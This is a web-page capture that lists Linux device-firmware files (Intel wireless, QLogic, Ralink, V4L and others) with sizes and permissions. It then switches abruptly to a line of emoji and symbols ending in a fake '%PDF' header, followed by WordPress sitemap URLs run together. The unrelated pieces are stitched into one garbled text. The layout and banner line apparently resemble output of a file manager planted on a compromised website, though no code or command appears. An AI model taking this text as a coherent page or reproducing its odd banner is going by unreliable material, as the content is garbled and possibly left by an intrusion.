iwlwifi-9000-pu-b0-jf-b0-33.ucode File 2.51 MB 0644
iwlwifi-9000-pu-b0-jf-b0-34.ucode File 2.55 MB 0644
iwlwifi-9000-pu-b0-jf-b0-38.ucode File 2.4 MB 0644
iwlwifi-9000-pu-b0-jf-b0-41.ucode File 2.5 MB 0644
iwlwifi-9000-pu-b0-jf-b0-43.ucode File 2.43 MB 0644
iwlwifi-9000-pu-b0-jf-b0-46.ucode File 1.38 MB 0644
iwlwifi-9260-th-b0-jf-b0-33.ucode File 2.52 MB 0644
iwlwifi-9260-th-b0-jf-b0-34.ucode File 2.55 MB 0644
iwlwifi-9260-th-b0-jf-b0-38.ucode File 2.4 MB 0644
iwlwifi-9260-th-b0-jf-b0-41.ucode File 2.5 MB 0644
iwlwifi-9260-th-b0-jf-b0-43.ucode File 2.44 MB 0644
iwlwifi-9260-th-b0-jf-b0-46.ucode File 1.39 MB 0644
iwlwifi-cc-a0-46.ucode File 1019.6 KB 0644
lbtf_usb.bin File 116.1 KB 0644
lgs8g75.fw File 262 B 0644
mt7601u.bin File 44.35 KB 0644
mt7650.bin File 359.59 KB 0644
mt7662.bin File 79.99 KB 0644
mt7662_rom_patch.bin File 25.73 KB 0644
mts_cdma.fw File 13.52 KB 0644
mts_edge.fw File 13.74 KB 0644
mts_gsm.fw File 13.52 KB 0644
mts_mt9234mu.fw File 13.45 KB 0644
mts_mt9234zba.fw File 13.45 KB 0644
myri10ge_eth_big_z8e.dat File 369.95 KB 0644
myri10ge_eth_z8e.dat File 369.86 KB 0644
myri10ge_ethp_big_z8e.dat File 380.02 KB 0644
myri10ge_ethp_z8e.dat File 379.94 KB 0644
myri10ge_rss_eth_big_z8e.dat File 523.63 KB 0644
myri10ge_rss_eth_z8e.dat File 523.61 KB 0644
myri10ge_rss_ethp_big_z8e.dat File 533.14 KB 0644
myri10ge_rss_ethp_z8e.dat File 533.13 KB 0644
phanfw.bin File 1.76 MB 0644
qat_895xcc.bin File 435.84 KB 0644
qat_895xcc_mmp.bin File 111.5 KB 0644
qat_c3xxx.bin File 259.22 KB 0644
qat_c3xxx_mmp.bin File 112.13 KB 0644
qat_c62x.bin File 388.81 KB 0644
qat_c62x_mmp.bin File 112.13 KB 0644
qat_mmp.bin File 111.5 KB 0644
ql2100_fw.bin File 75 KB 0644
ql2200_fw.bin File 82.58 KB 0644
ql2300_fw.bin File 122.32 KB 0644
ql2322_fw.bin File 132.85 KB 0644
ql2400_fw.bin File 259.08 KB 0644
ql2500_fw.bin File 268.68 KB 0644
ql2600_fw.bin File 332.14 KB 0644
ql2700_fw.bin File 369.61 KB 0644
ql8300_fw.bin File 281.34 KB 0644
r8a779x_usb3_v1.dlmem File 9.23 KB 0644
r8a779x_usb3_v2.dlmem File 9.2 KB 0644
r8a779x_usb3_v3.dlmem File 9.2 KB 0644
regulatory.db File 4.15 KB 0644
regulatory.db.p7s File 1.15 KB 0644
rp2.fw File 63 B 0644
rsi_91x.fw File 91.89 KB 0644
rt2561.bin File 8 KB 0644
rt2561s.bin File 8 KB 0644
rt2661.bin File 8 KB 0644
rt2860.bin File 8 KB 0644
rt2870.bin File 8 KB 0644
rt3070.bin File 8 KB 0644
rt3071.bin File 4 KB 0644
rt3090.bin File 8 KB 0644
rt3290.bin File 4 KB 0644
rt73.bin File 2 KB 0644
s2250.fw File 9.29 KB 0644
s2250_loader.fw File 1.07 KB 0644
s5p-mfc-v6-v2.fw File 335.7 KB 0644
s5p-mfc-v6.fw File 299.13 KB 0644
s5p-mfc-v7.fw File 373.75 KB 0644
s5p-mfc-v8.fw File 352.13 KB 0644
s5p-mfc.fw File 344.39 KB 0644
sdd_sagrad_1091_1098.bin File 816 B 0644
sms1xxx-hcw-55xxx-dvbt-02.fw File 83.65 KB 0644
sms1xxx-hcw-55xxx-isdbt-02.fw File 68.82 KB 0644
sms1xxx-nova-a-dvbt-01.fw File 83.65 KB 0644
sms1xxx-nova-b-dvbt-01.fw File 74.57 KB 0644
sms1xxx-stellar-dvbt-01.fw File 38.96 KB 0644
tdmb_nova_12mhz.inp File 39.16 KB 0644
ti_3410.fw File 13.44 KB 0644
ti_5052.fw File 13.44 KB 0644
tlg2300_firmware.bin File 50.75 KB 0644
tr_smctr.bin File 7.44 KB 0644
usbdux_firmware.bin File 1.73 KB 0644
usbduxfast_firmware.bin File 999 B 0644
usbduxsigma_firmware.bin File 8 KB 0644
v4l-cx231xx-avcore-01.fw File 16 KB 0644
v4l-cx23418-apu.fw File 137.89 KB 0644
v4l-cx23418-cpu.fw File 154.62 KB 0644
v4l-cx23418-dig.fw File 16 KB 0644
v4l-cx23885-avcore-01.fw File 16 KB 0644
v4l-cx25840.fw File 16 KB 0644
vntwusb.fw File 11.08 KB 0644
vpu_d.bin File 2.84 MB 0644
vpu_p.bin File 128.11 KB 0644
whiteheat.fw File 23 KB 0644
whiteheat_loader.fw File 5.49 KB 0644
wil6210.brd File 3.5 KB 0644
wil6210.fw File 390.98 KB 0644
wsm_22.bin File 95.53 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml